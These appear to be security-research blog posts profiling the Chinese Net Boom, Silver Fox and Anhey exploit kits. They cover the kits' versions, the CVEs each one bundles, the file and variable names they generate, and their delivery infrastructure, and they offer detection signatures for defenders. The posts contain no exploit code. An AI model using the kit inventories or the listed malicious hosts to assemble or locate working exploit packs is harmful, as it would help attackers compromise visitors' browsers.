The default package, as displayed on the user interface, included CVE-2010-0806, CVE-2011-0611, CVE-2011-2110 and CVE-2011-2140.  Unfortunately, I could not obtain a copy of NB Exploiter 2.8.4.6 to generate the code associated with the package.  This default package, as well as some variations that include CVE-2010-3962 and CVE-2011-1255, can be found, however, in security achieves by searching for unique file names, variable names, function names and padding strings associated with Net Boom’s code. Some examples of these names are listed below:

NETBOOM.HTML, NB.HTML, NB.JS, NB.SWF, NBWM.SWF, NET BOOM, NBOOM, NBWANGMA, NBWM

Given the release dates of the advisories and the discovery dates of the Net Boom samples in the wild, I think it is safe to say that NB Exploiter Version 2.8.4.6 was not released until about October or November of 2011. By late 2011 to early 2012, all of the IE and Flash exploits listed on the interface of NB Exploiter Version 2.8.4.6 could be found deployed as integrated packages in the wild.  Clean-mx.de and Jsunpack.jeek.org queries for 61.159.225.18 provide good examples of a complete Net Boom pack as described below:

Nbpack3

On 20 January 2012, j53s.js6.in/401/ww/ht.html was the landing page for exploits served from IP 61.159.225.18.  The landing page led to exploits for IE exploits CVE-2010-0806, CVE-2010-3962 and CVE-2011-1255; and Flash exploits CVE-2011-0611, CVE-2011-2110 and CVE-2010-2140.

ht

The three IE exploits where delivered by IE6.HTML, CE.HTML and YY.HTML.  The CVE-2010-0806 exploit was contained in files named IE6.HTML, 1.JS, 2.JS, 3.JS, 4.JS, 5.JS and 6.JS.  The CVE-2010-3962 exploit was included in files named CE.HTML, CEO1.JS, CEO2.JS, CEO3.JS, CEO4.JS and CEO5.JS.  CEO4.JS contained the trigger for the CVE-2010-3962 exploit.  The CVE-2011-1255 exploit was delivered by files named YY.HTML and Y1.JS and Y2.JS.

The three Flash exploits were implemented using the following files.  File 1.HTML determined which exploit would be served to the victim browser based on the Flash version and browser type and version.  The CVE-2011-0611 was contained in 2.HTML and NB.SWF.  The CVE-2011-2110 exploit was contained in 3.HTML.   The CVE-2011-2140 exploit was contained in NBWM.SWF and called directly from 1.HTML.

1

File 1.HTML called NB.JS in order to determine the version of Flash used by the victim’s browser.  File NB.JS was a modified copy of SWFObject Version 1.5.1 – an Open Source tool for Flash Player detection and embedding Flash content into web pages.

nbjs-1

In some other samples, the authors of the exploit kit modified the first line of the code to replace the URL for the author’s site with the string NETBOOM as shown below:

nbjs-2

In addition to the file names NB.JS, NB.SWF and NBWM.SWF for the flash exploit, some other references to Net Boom are found in the 1.HTML variable names NBMM and NBGG.  Numerous other references are included in the IE exploit code for CVE-2010-0806, CVE-2010-3962 and CVE-2011-1255.  The CVE-2010-0806 exploit used NBYEAH, NBMMM, NBMS and NBOOM.

0806

The variations of Net Boom and NB Exploiter in the CVE-2010-3962 exploit included NBMWHAHA, NBWMXIXI, NBA, NBREPLAY, NBGUAI, NBMAO, NBLONG, NBTOYOTA and NBSTR0.

3962

The CVE-2011-1255 exploit included a function named NBWM().

1255

Conclusions:

Net Boom NB Exploiter version 2.8.4.6 appears to be the last version of the Net Boom kit.  Version 2.8.4.6 may have been released as early as October 2011.  Exploit packages most likely generated from NB Exploiter version 2.8.4.6 were deployed between November 2011 and March 2012.  These packs included links to tracking sites such as 51YES.com, code for checking and setting cookies on the victim machines, and logic for determining the optimal Flash or IE exploit for a given victim browser configuration.

Deployments of these complete exploit packages from NB Exploiter version 2.8.4.6  ended in March 2012, but vestiges of these packages live on in other more recent exploits kits.  The CVE-2010-0611 exploit code, complete with flagrant references to Net Boom, was observed in conjunction with the Zhi-Zhu (Spider) exploit pack.  An example of this kind of hybrid was seen in 51767.com/data/pub/tlbbn.html in July, 2012.  Generally, the two packs used the same exploits excepting CVE-2012-0003.  Could Zhi-Zhu Pack be an updated version of Net Boom NB Exploiter version 2.8.4.6?

Net Boom landing pages, such as HT.HTML or MD.HTML, are very similar to the YG.HTML file used by the Yang Pack as described by the Kalhu Security blog on 12 January 2012.  The file in Net Boom’s pack for determining which Flash exploit to use, 1.HTML, is very similar to the file T.HTML used in the Yang pack.  Also, both files use the open source script SWFObject 1.5.1 for determining the victim’s version of Flash.  A main difference between the two packs is that Yang Pack, like other more recent Chinese exploit packs, included a CVE-2011-3544 exploit but Net Boom did not include a CVE-2011-3544 exploit.  Could Yang Pack somehow link Net Boom with more recent packs seen in 2012 and 2013?  The question about the relationship between Net Boom, Zhi-Zhu Pack and Yang Pack deserve more attention that I can give them here.

To end this post, it is worth mentioning that much of the data I examined suggested that the Net Boom kit evolved into a new exploit kit not previously documented by the security community called CK Exploit.  Like Net Boom, Silver Fox and Anhey, the CK Exploit Kit has its own web site.  Around April 2012, sites that had been serving Net Boom exploits began changing Net Boom associated file names and variable names to CK associated file names and variable names.  For example, the file NB.SWF that implemented a CVE-2011-0611 exploit changed to CK.SWF.  The file NBWM.SWF that implemented a CVE-2011-2140 exploit changed to CKWM.SWF.  Once again, evidence suggesting the existence of the CK Exploit deserves more attention that I can give it in this post.

 

REFERENCES:

Korean Security Research Blog (http://kjcc2.tistory.com/1286)

CVE-2011-0611 (http://www.adobe.com/support/security/advisories/apsa11-02.htm)

CVE-2011-2110 (http://www.adobe.com/support/security/bulletins/apsb11-18.html)

CVE-2011-2140 (http://www.adobe.com/support/security/bulletins/apsb11-21.html)

Complete Kit (http://62.67.194.183/clean-mx/viruses.php?ip=61.159.225.18)(http://209.9.239.101/dec/go?report=de19f6015fad956fb72c82b96c0331a680060cd2 http://jsunpack.jeek.org/dec/goreport=0462312cf5e6be164677a4c9b5700c9df9cd5a74)

Flash Detection (http://blog.deconcept.com/swfobject/)(http://jsunpack.jeek.org/dec/goreport=7472f13441ddad502f2e4014c6a20bdfb6d7a087)

Zhi-Zhu Pack (http://www.kahusecurity.com/2012/another-chinese-pack/)

Yang Pack (http://www.kahusecurity.com/2012/chinese-exploit-packs/)

Net Boom Kits and Signatures

Introducing Net Boom

Net Boom is an exploit kit that was produced between 2010 and 2011.  The Net Boom Software Group used the web site 1874.cc for sales and support.  According to 1874.cc, Net Boom NB Version 1.0.1 was released on 28 April 2010 and  was released again on 10 May 2010.   Another version named NB Exploiter Version 1.0.0.1, was created in late November of 2010.  Net Boom’s NB Exploiter 2011 Version 2.0.1.1 was produced in January of 2011. The Net Boom authors also released single exploit kits for at least an IE 0-Day vulnerability, a Flash 0-Day vulnerability and a Flash Version 10.3 vulnerability.   The 1874.cc website is no longer active.  A 26 June 2011 screen shot of the site from dawhois.com is reproduced below.  Images of their products are included at the bottom of the 1874.cc page.

1874_cc

 

The Net boom Software Group also developed Korea and English language versions of the Net Boom kits that were probably sold and serviced through the website s-shark.com. Both the Korean and English language versions, however, retained references to 1874.cc.  The Korean language Net Boom kits were packaged with the Net Bot Distributed Denial of Service (DDOS) attack software that also originated from China. The Korean NB Exploiter Version 2.8.4.6 and a single-exploit kit for a Flash 10.3 vulnerability was released some time in 2011 and shown in the graphic for s-hark.com.   Evidence in Virus Total reveals an English language version of the Net Boom NB Exploiter 1.0.0.1.  A screen shot of s-shark.com products is shown below.  The image is from a  Korean language security research blog post available here.

 

s-shark_com_20111107_134423

 

The security researchers investigating the S-Shark product offerings found what appears to be a 2011 English language version of an unspecified single exploit kit.A screenshot of another unspecified 2011 single Flash 0-Day exploit Net Boom kit was available on a Chinese language hacker site since November 2011.  This Chinese language kit looks very similar to the English language single exploit kit.

NetBoom111820yn0qxsp5g00h0wth

 

Another single exploit kit for CVE-2011-0611 and an unspecified NB exploit kit were reported by Kahu Security’s Blog in their 22 April 2011 post entitled “Flash 0Day Found in Drive-By”. The author redacted the name and version of the kits from the graphics.   The references to Net Boom in the code fragments, or tool marks as described by the author, reveal that a Net Boom kit was the source of the exploit CVE-2011-0611 exploit described in the post.  The types of references included in the code are described in more detail in the following paragraphs.

2011-04-22_072011-04-22_08

 

A Quick Look at a Few of the Kits

NB Exploiter Version 1.0.0.1 and NB Exploiter 2011 Version 2.0.1.1 are available
for download on several Chinese language hacker sites.  Net Boom NB Exploiter Version 1.0.0.1 offers six different exploits and a package of exploits for Flash 9 Flash 10 and MS-Office. The packaged exploits were MS Office (CVE-2009-1136), a MS MPEG-3 exploit, MS10-002 (CVE-2010-0249), MS10-018 (CVE-2010-0806), Flash 10 (CVE-2009-1862) and Flash 0Day (CVE-2010-1297).

NB Exploiter Version 2.0.1.1 was significantly different from Version 1.0.0.1 in appearance and content.  The code generated in this version lack the much of the script fragmentation, obfuscation and distinctive variable naming conventions found in the previous version.  Version 2.0.1.1 generated 31 exploits ranging from MS06-16 to both more recent well-known and obscure exploits including the following: Flash 10.0.32 (CVE-2010-1297), an Apple Safari 4.0.5 exploit,  Shockwave Player 11 (CVE-2010-3653), Adobe SVG Viewer MS10-081 (CVE-2010-2746), two IE MS10-090 exploits (CVE-2010-3962), an Advanced File Vault exploit, a Trend Micro 2010 exploit, a  Net-Craft Tool Bar exploit, a MS11-XXX 0-Day exploit (IE CSS MS11-003 CVE-2010-3971), a WMI-Tools exploit (CVE-2010-3973), and a Real-Player 0-Day exploit (CVE-2010-3749).  It is unclear why Version 2.0.1.1 was so different from this or the original version or the subsequent version.  Subsequent versions were probably more similar to Version 1.0.0.1 than to Version 2.0.1.1.

Comment lines inside the code for the Version 2.0.1.1 the Net-Craft Tool Bar exploit that included lyrics from the KC and the Sunshine Band 1975 hit single “Get Down Tonight”.  The comments claimed authorship by the 1874.cc Software Group.  The Authors appear to be fans of 1970s era Western disco in addition to processing English language skills.

The Korean language NB Exploiter Version 2.8.4.6 offers nine different exploits and a package for CVE-2010-0806, Flash 10.2, Flash 10.3 and an unspecified Flash 0-day exploit.    Version 2.8.4.6 single exploits included MS Office (likely CVE-2009-1136), MS10-018 (CVE-2010-0806), IE CSS (likely CVE-2010-3971), Flash 10.2.153 (likely CVE-2011-0611), Flash 10.3.181.23  (likely CVE-2011-2110), an unspecified Flash 10.3 0-Day, an unspecified  Fire-Fox 3.6 0-Day, and a Real-Player 14 exploit.  The appearance of the user interface is much more similar to Version 1.0.0.1 than it is to Version 2.0.1.1.  Screen shots all three versions are provided below.

NBExploiter201

netBoom2010NBEv2.8.4.6

Based on traffic analysis, it is likely that the Flash 0-Day exploit works against CVE-2011-2140 using a file named NBWM.SWF.  This conclusion is supported by analysis of the code fragments in Kahu Security’s 11 November 2011 post, “CVE-2011-2140 Caught in the Wild”.  The reasoning between this type of analysis is described in the following paragraphs.

 

Net Boom Signatures

A closer look at the exploit code reveals origins of Net Boom and reveals distinctive file naming and variable naming conventions that can be used to identify Net Boom exploits in archived network traffic.  By building a robust set of distinctive signatures, it may be possible to follow the evolution of the Net Boom kits well beyond the mid 2011 Versions currently available.

Version 1.0 packages exploits for MS Office and Flash into the files 1.HTM, 2.HTM, NB.HTML, NB2.HTM, NETBOOM.HTML and NF9.HTM.  The Flash 9 exploit included files selected from I115.SWF, I47.SWF, I45.SWF, I64.SWF, F115.SWF, F47.SWF, F45.SWF, and F64.SWF.  The Flash 10 exploit used files NF10.HTM and FA.HTM. File NB.HTML included a place holder for the statistical code. The package contains decision-making algorithms for identifying the optimal exploit for a given victim.   NETBOOM.HTML and NF9.HTM contained conditional statements based on browser types and versions.  NB2, 1.htm and 2.HTM implemented the exploits.  The files generated for the other six single-exploits are listed below:

MS Office (CVE-2009-1136):  OF.HTM, QCC.JPG and UBBI.JPG

MS MPEG-3: BB.JPG, BB1.JPG, BBBB.JPG, BBBB1.JPG, BBBBB.JPG, UBB.JPG and MP.HTML

MS10-002 (CVE-2010-0249): MS~10002.HTM, PATY.JS and HaspxcSWmblWluWORuCKy.GIF

MS10-018 (CVE-2010-0806): X6.HTM, X7.HTM, NB.JS, NB.JS, NB.JS, A.JPG, B.JPG, C.JPG and D.JPG

Flash 10 (CVE-2009-1862):  IE.HTM, NF10.HTM, FF.HTML, IE.JS, IF.JS, FF.JS and XP.SWF

Flash 0-Day (CVE-2010-1297): FA.HTML and NB.SWF

The NB Exploiter Version 1.0.0.1 exploits are very similar to the Silver Fox and the Anhey Kit exploits.  Much of the NB Exploiter code appears to have been copied directly from Silver Fox or Anhey exploit kits.  Subsequently, many of the file names and variable names found in the code can also be found in the older kits. To distinguish the new Net Boom file and variable names from the older Anhey and Silver Fox file and variable names, I have italicized the older names and underlined the new Net Boom names in the list below:

Exploit Package Files: SVFOXMM, SVFOXWW

MS Office (CVE-2009-1136):  YINHU, YINHUKING, YINHUMM, YINHUGG, YHWMYHWM, YHWM2, YHWM2, YHWM6, SSVVSVSV, SVSVSVSVSVSV, SVANTI, SVCNN,
CCKKL
, NB00-NB27

MS MPEG-3: SILVERFOX, SILVERFOXWM, SILVERFOXFMY, SFWMSFWMSFWM, SILVERCOLOR, SILVERCOLORFOX, SFQQQ, FOXMM, FOXGG, FOXBB, FOXYY, FANGPIJIUCHOU, SUNSHINE, MONEY, YHHAOYUN, NB00-NB27

MS10-002 (CVE-2010-0249): SSS, CC, WMAHWM, OAH, OAHO, LHAH, HHAH, SSAH, SHIT, HUA, HUA1, HUA2, HUA3, HUA4, HaspxcSWmblWluWORuCKy

MS10-018 (CVE-2010-0806): SVFOX, SVFOXNET, YINHUWAGMA, ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM, SUN, NB.WM, NBWANGMA

Flash 10 (CVE-2009-1862):  PARAM NAME=”MOVIE” VALUE=”DONE.SWF”, EMBED SRC=”XP.SWF”, SSS, QVISI=”YOU”, IFMY,  XP.SWF

Flash 0Day (CVE-2010-1297): NB, BB, EMBED SRC=’NB.SWF’

References to Anhey kit include the phonetic representations of “暗黑” ANHEY, ANHEI or the abbreviation AH.  References to the Silver Fox Exploit Kit include variations such as SVFOX of SF, and phonetic representation of “银狐”, YINHU, or YH.  References to Net Boom NB Exploiter Kit include variations of NETBOOM or the abbreviation NB.  References to any of the three kits may be joined to WANGMA or its abbreviation WM.  WANGMA is a phonetic representation of “网马” which translates to Network Trojan.

The Net Boom kit included a set of Instructions for injecting the exploit code into third party websites.  Nearly identical instructions were found in the Anhey and Silver Fox Exploits Kits.  Additionally, the Net Boom, Silver Fox, and Anhey Kits all used the same third party Skin++ library for the user interface.

Consistent use of code fragmentation to evade detection, the presence of shared shell code fragments in the exploit code, used of XoR0 0xBD encoding, use of similar obfuscation methods, the practice of using variations of product name as variable names, the existence of references to multiple exploit kit names in a single file, and the use of the same 2009 Skin++ library DLL file indicate that these three kits may share a single author.  For more detail on the Silver Fox Exploit kit, please read my 17 February 2013 post, Silver Fox Galleries.  For more details on the Anhey Exploit Kit, please read my 07 February 2013 post, Anhey Menagerie.

In addition to the terms NETBOOM.HTML, NB.HTML, NB.JS, NB.SWF, NBWANGMA, NBWM, NB discussed above, one can find several other very likely Net Boom traffic signatures by searching through security repositories such as JSUNPACK, WEPAWET and Clean-MX.  Some very like terms recovered from these sources include the following:

NB.EXE, NB.JS, NB6.SWF, NB8.SWF, NBWM.SWF , NBWM(), NB(), NETBOOM, NETBOOM00, NBBOOM, NBOMM, NBA, NBAA, NBBB, NBCC, NBCODE, NBCODING, NBGG, NBGUAI, NBKING, NBLOL, NBLONG, NBLUCK, NBMAO, NBM, NBMM, NBNB, NBNOP, NBOORPK,  NBRPK NBPOWER, NBREPLAY, NBSENDING, NBSIZE, NBSS, NBTIME, NBSTR, NBSUN, NBTOYTA,  NBVIVI, NBWMA, NBWMHAHA,  NBWMYO, NBWMX, NBWMXIXI, NBX,  NBYEAH, NBZF, NB14093,
NB818588, NB818599, NB860488, NB98748

Conclusions

The Net Boom exploit kits are very similar to the earlier Chinese Language Exploit Kits Anhey and Silver Fox.  Net Boom products were serviced through the Chinese website 1874.cc in much the same way Silver Fox products were supported by SVFox.net and Anhey products were supported by Cuteqq.cn.  The Anhey and Silver Fox kits stopped evolving in late 2010 to early 2011.  The Net Boom kits, however, continued to add new exploits through at least late 2011 with the addition of CVE-2011-2140.  By tracking networks traffic signatures unique to Net Boom, it may be possible to determine if Net Boom has continued to evolve past 2011.

References

1874.cc June 2011 Screen Shot (http://dawhois.com/site/1874.cc.html)

Korean Security Research Blog (http://kjcc2.tistory.com/1286)

Kahu Security, 22 April 2011, “Flash 0Day Found in Drive By”  (http://www.kahusecurity.com/2011/flash-0day-found-in-drive-by/)

Kahu Security, 12 November 2011, “CVE-2011-2140 Caught in the Wild” (http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/)

 

 

Silver Fox Gallery

The Silver Fox Exploit kit is available on several Chinese language hacker sites.  The first edition of the kit was released in early to mid-2009 and the last edition appears to have been created in January 2011.  The kit was created by the Silver Fox Working (银狐工作组) group and was originally distributed and serviced via the group’s website SVFOX.NET. In addition to the main exploit kit, the Silver Fox group also released several single-exploit kits also serviced by SVFOX.NET.  The main exploit page of the last known Silver Fox Exploit Kit and a screen shot of the last working instance of the SVFOX.NET website is shown below:

svfox2011_c

svfoxGrp

The gallery of Silver Fox releases below shows Version 1.5, Version 1.6, and Version 1.8 of the full kit released in 2009.  Version 3.4.1 was produced in April 2010, and Version 4.1.6 was created in January 2011.  Four single-exploit kits included builds for claimed 0day exploits for MS09-014, a DirectX-Show vulnerability, a MP3 vulnerability and an IE7 vulnerability.

 

Version 1.8 introduced tabs for navigating through the application and replaced the Firefox icon in the upper right corner with the Silver Fox icon.  This version also listed a second website address, SVFOXWM.51.NET in addition to SVFOX.NET.  Most of the interface was in Chinese, but some parts where in English suggesting the authors processed a command of both languages.  Version 1.8 included a simple script for obfuscating code using the JavaScript STRING.FROMCHARCODE command or its equivalent in Visual Basic.  The kit included instructions and code samples for placing hidden calls to the exploit code into the webpages that potential victims might visit.

 

Version 3.4., listed a second website, SVFOX.COM.CN.  Version 3.4.1 featured the same six navigation tabs as Version 1.8, but also included a text box for specifying an address for a web analytics service.  The default service providers were 51.Yes and 51.La.  The updated interface also offered a package of exploits to be used in conjunction with code that determined key facts about the victim’s software configuration and chose the best exploit accordingly.  The simple STRING.FROMCHARCODE script in this version included for calling “eatsmart4u.or.kr/admin/comm.js” suggesting that the Silver Fox Working Group may have had a connection to Korea.

 

In Version 4.1.6, the secondary website listed on the first tab returned to SVFOXWM.51.NET rather than SVFOX.COM.CN.  The package of exploits was updated to include Flash 10 exploit and an IE CSS 0-Day exploit.  The CVE-2010-0806 exploit was now listed as MS10-018 vice IE PEERS.  The obfuscated script reference to “eatsmart4u.or.kr/admin/comm.js” was removed and replaced with a copy of the script itself in decimal ASCII.

Silver Fox Version 4.1.6 generated the following exploits and files:

MS OFFICE (CVE-2009-1136): OF.HTM, AC.JPG, BC.JPG, CC.JPG

MS06-004 (CVE-2006-0020): SV14.HTM, 14.JS, 15.JS, 16.JS, 17.JS, 18.JS, 19.JS

MS09-002 (CVE-2009-0075): SV90.HTM, 92.JS, 93.JS

ADOBE PDF:  XP.SWF

MS MPEG-2 (CVE-2008-0015):  SF.HTM, BB.JPG, BB1.JPG, BBBB.JPG, BBBB1.JPG, BBBBB.JPG, LOG.GIF

MS10-02 (CVE-2010-0249): IE.HTM, PARTY.JS, HaspxcSWmblWluWORuCKy.GI

MS10-018 (CVE-2010-0806): X6.HTM, X7.HTM, IFOX.JS, IFOX2.JS, IFOX3.JS, B.JPG, C.JPG, D.JPG

IE CSS 0Day (CVE-2010-3962): IE.HTM, IE.JS

REALPLAYER 11 (CVE-2010-3747): SVR11.HTM, R2.CSS, R.CSS

THUNDER 5 (XUNLEI) (CVE-2007-6144): SVXL.HTM, XL.JS, XLS.JS

FIREFOX 3. X (CVE-2009-2478): SVFFOX.HTM, SVFOX.HTM, ECFOX.JS, ECFOXX.JS

IE7 0DAY (CVE-2009-3672): I7.HTM, I8.JS, UBS.JS

FLASH 9 (CVE-2007-0071): F16.SWF, F28.SWF, F45.SWF, F47.SWF, F64.SWF, F115.SWF, I16.SWF, I28.SWF, I45.SWF, I47.SWF, I64.SWF, OR I115.SWF

FLASH 10 (CVE-2009-1862): IE.HTM, SVF10.HTM, FF.HTML, IE.JS, IF.JS, FF.JS, XP.SWF

The Silver Fox decision making code to match the victim’s system configuration with the best exploit was contained in the following files:

Exploit Package Files: SILVER.HTM, FOX.HTM, SVF.HTM, SVX.HTM, UBB.JS

Like the Anhey Kit, the authors of the Silver Fox kit were not shy about using explicit references to their product in the file and variable names generated by their software.  This approach can clearly be seen in the file names listed above to include SILVER.HTM, FOX.HTM, SVF.HTM, SVX.HTM, SVF10.HTM, SVFFOX.HTM, SVFOX.HTM, ECFOX.JS, ECFOXX.JS, SVR11.HTM, IFOX.JS, IFOX2.JS, IFOX3.JS, SF.HTM, SV90.HTM and SV14.HTM.

Several more references to the products name can be found inside of the files.  Names such as SILVERFOX, SVFOX, SVF, SV and SVFOXNET require no explanation.  Other names represent Chinese Characters transcribed into Chinese Pinyin.  The Chinese characters for Silver Fox are “银狐” and the Pinyin for Silver Fox is Yín hú or YINHU.  The Pinyin for the characters 网马 is Wǎng mǎ or WANGMA and translated to Network Horse, or Network Trojan.  WANGMA is a common term used in Chinese language hacker sites to describe browser-based exploits that originate from legitimate websites infected by SQL injection or ARP cache poisoning.  The characters 银狐网马 or Pinyin Yín hú Wǎng mǎ translates to Silver Fox Network Trojan.  In Silver Fox Exploit Kit code, the Pinyin “Yín hú Wǎng mǎ“ is frequently written as YINHUWANGMA or abbreviated to YHWM.  The terms WANGMA or WM are sometimes preceded by English vice Chines spellings of the kit name as in SVFOXWM or SFWM.  The list below includes some of the more unique variable names organized by exploit:

MS OFFICE (CVE-2009-1136): SILVERFOX, SVFOXNET, YINHU, YINHUKING, YHWM, YHWMWHYM, YINHUMM, YNHUGG, YINHUU, YINHU00, YINHO01, YINHO02, YINHU03, IFOXNET, IFOX, KO, CCKL

MS06-004 (CVE-2006-0020): SILVERFOXCODE, SVFOXWM, SFWM, SVFOXNAME, LOVESVFOXXX, WWWSVFOXNET, WWWSVFOXCN, SVFOXZF, SVFOXZFS, SVFOXZFX, SVFOXADO, WOWFOX, IFOXFOXWM, SVFOXXML, CHILAM

MS09-002 (CVE-2009-0075): SVSVSV, FANGP, CAONIMA, LASHI, LANIO

ADOBE PDF:

MS MPEG-2 (CVE-2008-0015):  SILVERFOXWM, SFWMSFWMSFWM, SILVERCOLOR, SILVERCOLORFOX, SFQQQ, FOXMM, FOXGG, FOXBB, FOXYY, FANGPIJIUCHOU, SUNSHINE, MONEY

MS10-02 (CVE-2010-0249): SSS, CC, WMAHWM, OAH, OAHO, LHAH, HHAH, SSAH, SHIT, HUA, HUA1, HUA2, HUA3, HUA4

MS10-018 (CVE-2010-0806): SVFOXNET, YINHUWAGMA, ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM, SUN

IE CSS 0Day (CVE-2010-3962): SVFOXWMA, SVNOP, SF

REALPLAYER 11 (CVE-2010-3747): SVKILL, BBQ

THUNDER 5 (XUNLEI) (CVE-2007-6144): SFCODE, SFXCODE, HELLOWORLD2ADDRESS, HBSHELLOWORLD, ECQQUNE, ECQQXUS, XFY

FIREFOX 3. X (CVE-2009-2478): QZONE_EXE, ANTI_EXE, KAPERSKY_EXE, ANTI_EXE, KABA, LOREMIPSUMDOLOREGKUW, LOREMIPSUMDOLOREGKUWIERT, LOREMIKDKW

IE7 0DAY (CVE-2009-3672): FOXYY, FOX00-FOX27

FLASH 9 (CVE-2007-0071):

FLASH 10 (CVE-2009-1862): ARR, SSS, NOP, QVISI, DD, ‘PARAM NAME=”MOVIE” VALUE=”DONE.SWF”’, ‘EMBED SRC=”XP.SWF’

This unbashful use of the product name and company websites in the file and variable names is very similar to the techniques used by the Anhey (Diablo) Working Group associated with the Cuetqq.cn website.  These similarities in coding techniques, identical or very similar exploit code, identical application code, and some curious unique references to Anhey in the Silver Fox code reveal a strong relationship between the two kits.   Could the Anhey Exploit Kit and the Silver Fox Exploit Kit have been written by the same people?  Could the Silver Fox Exploit Kit and the SVFOX.COM website be the successors of the Anhey Exploit Kit and CUETQQ.CN website?  The answers are hard to determine with certainty, but there is definitely a lot of evidence to support these possibilities.

A lot of detail about the Anhey Working Group and Anhey Exploit kit is available in my 02 February 2012 post “Anhey Menagerie”.  Some of the code generated from the Silver Fox Exploit Kit is almost identical to the last Anhey Exploit Kits released in late 2009 through early 2010. The name ANHEY comes from an alternated spelling of the Pinyin ANHEI (Ànhēi) for the Chinese Characters “暗黑”.  In English, the word translated to darkness or Diablo.  The Anhey Exploit code includes numerous references to ANHEY, ANHEI and AH.

The Silver Fox exploit code for MS10-018 (CVE-2010-0806) makes several very clear reverences to both the Silver Fox Exploit Kit (YINHUWAGMA, SVFOXNET) and the Anhey Exploit Kit (ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM).  Some of these names were not previously seen in the code generated by the Anhey kits. So, it appears that the authors of the Silver Fox Kit intentionally included these unique references to the Anhey Exploit Kit.

In addition to these references, significant similarities can be seen in the MS OFFICE (CVE-2009-1136) exploit, the MS10-02 (CVE-2010-0249) exploit and the FIREFOX 3.X (CVE-2009-2478) exploit.  The Flash 9 and Flash 10 exploit files generated by the two kits are identical. The instructions generated by the kits for deploying the exploits were almost identical.  The only difference was the addition of the Silver Fox name to the first line of the text.  Likewise, the function for obfuscating code using STRING.FROMCHARCODE from Silver Fox and Anhey Version 2.4.1 were identical.  Finally, the two programs use the same third party Skin++ library (SkinPPWTL.dll) for creating the user interface as shown below.  The first screen shot is from the last Silver Fox 2011 Exploit Kit and the second screen shot is from the last Anhey 2010 Exploit Kit.

anhey_SVFox_skin

Similar relationships exist between the Silver Fox Exploit kit, the God Axe Exploit kit and the Net Boom Exploit Kit.

All of the scree shots used in this post are available here.

Anhey Menagerie

The Anhey/Cuteqq Exploit Kit began in 2007 and became popular in China in 2008.  The 2010, the kits was associated the DNF666 Mass SQL Injections.  No new releases have been identify since mid-2010 and the Cuteqq.cn and Anhey.com Web sites associated with the kit are no longer active.

Val Smith, Anthony Lai and Colin Ames’ white paper “Balancing the Pwn Trade Deficit” , and Armorize Technologies’ blog post, “Solving the puzzle: mass SQL injection+0day flash drive-by download attacks robint.us and 2677.in” provide thorough descriptions of the Anhey/Cuteqq Exploit Kit. The two sources use the following screen captures of the Anhey Exploit Kit and Cuteqq.cn web site in their reports:

anhey2010Pro5cuteqqcn

There are handful of Anhey kits, however, that were not covered by the reports or listed on the Cuteqq.cn screen capture shown above.  Since I have collected a small menagerie of these kits, I thought that I would share it here in hopes that others might find it interesting or useful. This is not an exhaustive collection of Anhey Exploit Kits – it is only what I could hobble together by scratching and pecking at hacker sites.  Please forgive the obvious omissions in my descriptions of the screen captures.  I do not know Chinese.

My collection begins in 2007 with Cuteqq.cn products released before the Anhey Exploit Kit was established. One image references Cuteqq.cn and features the name “Game Idea” over an X-box game controller with a superimposed image of a spider.  The name of the application, however, was “终极网马生成器6 Beta 1″, or “Ultimate Network Trojan Code Generator 6 Beta 1″.  The original image file included the date string 20070624. The second image shows the Ultimate Network Trojan Code Generator 6 Beta 3.   This image had a file date of 20070703.  Searches for 终极网马生成器6 indicate there is Beta 4 versions as well.

20070624121030544 20070703113924310

A download of the Ultimate Network Trojan Code Generator 6 Beta 6 SP 2 had a modification date of 20070731 and included references to the Cuteqq.cn site.  The properties for the executable listed the Foreign Land Team (FLT) as the company producing the software.  Some of the variable and function names in the code generated by this kit include CUTEQQ, CUTEQQCN, CUTEQQVIP, WWWCUTEQQCN, and QQ784378237 – all hallmarks of Anhey-generated code.  A person using the name Chilam may have been one of the contributors of to the code.

cuteqq-Ult6bSp2 cuteqq-Ult6bSp2Properties

The next Cuteqq.cn kit I encountered had a date string of 20070913 in the file name.  The faint watermarks behind the graphically displayed product name look similar to the watermarks in 20070731 Ultimate Network Trojan kit.  The name, however changed to “暗黑網馬” which translates to “Diablo Network Trojan”.  The characters are pronounced “Ànhēi wǎng mǎ”.   The authors of the code frequently write the name as ANHEY WANGMA, ANHEY  or AH.

The Anhey name changed again in a kit released in January 2008.  The graphic display featured a caricatures of the Devil to the left of the new names “暗黑工作組” and “黑客X档案”.  The first name translated to “Diablo Working Group” and the second name translated to “Hacker X Files”.  A 20080116 Chinese-language post by a blogger named LZHacker explains that the new exploit kit was the result of collaboration between the Hacker X Files Group at  bbs.hackerxfiles.net and the Diablo Working Group at www.cuteqq.cn.  The machine translation and original text of the post are available here.

20070913150758242 20086271011392529

Another noteworthy feature of the January 2008 Anhey Exploit Kit are the English words “The more you learn, the more you know, The more you know, the more you forget The more you forget, the less you know. So why bother to learn.”  The authors appear to have a good command of English in addition to Chinese.

By 20080601 Version 2 of the Anhey Exploit Kit was available.  This version retained the overall appearance of the 20080101 kit expect the references to the Hacker X-Files Group was removed and the graphics were displayed against a more textured orange background.  The textured background can probably be attributed to the use of the Skin++ graphics library (SkinPPWLT.dll) included with all of the recent editions of the Anhey Exploit Kit.  In addition to the Version 2 release, the group release a Version 2.74 and Version 2.76 most likely between June and October of 2008.

anhey_2 anhey2_74 anhey2_76

The XiaoLin Security Team described the Diablo (Anhey) Network Trojan VIP 2008 Standard Version 3.0 in an article dated 20080430.  The article read like a product brochure, included a pricing schedule and explained the benefits of a premium subscription.  At the time, the official version of the kit was the 2008 VIP 2.0.  The VIP 2008 Version 3 was released as a R&D beta.  The R&D release included exploits that were not included in previous editions or latter editions of the kit.  Taken together, the exploits offered in this special release seem to match the exploits used in the 2008 SQL Injections attacks that resulted in the United Nations service malware.  The style of the user interface in the R&D release shown below would not become the product’s standard interface until late 2009.

042901

